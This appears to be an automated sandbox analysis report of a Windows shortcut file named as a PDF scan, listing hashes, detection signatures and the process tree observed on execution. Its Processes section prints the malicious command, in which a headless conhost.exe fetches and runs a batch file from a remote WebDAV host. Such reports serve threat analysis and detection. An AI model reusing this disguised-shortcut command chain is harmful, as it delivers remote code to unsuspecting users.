Analysis
-
max time kernel
119s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
03-08-2024 12:44
Static task
static1
Behavioral task
behavioral1
Sample
E_DOC_SCAN_8320402943874291347_pdf.download.lnk
Resource
win7-20240705-en
windows7-x64
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
E_DOC_SCAN_8320402943874291347_pdf.download.lnk
Resource
win10v2004-20240802-en
windows10-2004-x64
2 signatures
150 seconds
General
-
Target
E_DOC_SCAN_8320402943874291347_pdf.download.lnk
-
Size
1KB
-
MD5
fcfe41cc55881aae3963605dfd103ae7
-
SHA1
edaa9a8e5c5a8dcbf2d511884d73a17d4e1c8b78
-
SHA256
c573cf0de7779f505f6a8d93fa8dcac5a4bbb4b691cbe1d710cab2e3513d9703
-
SHA512
91bcac1869133ea8d17339839f8ed3674a1c9e63dbc265aae22661c254ade6cbe854c6e2669faff63ed8759cdbbf244dc8e4ca541679cdd12304565991557075
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2012 wrote to memory of 2104 2012 cmd.exe conhost.exe PID 2012 wrote to memory of 2104 2012 cmd.exe conhost.exe PID 2012 wrote to memory of 2104 2012 cmd.exe conhost.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\E_DOC_SCAN_8320402943874291347_pdf.download.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" --headless \\burrkeklprinting.tech@5378\DavWWWRoot\new.bat2⤵PID:2104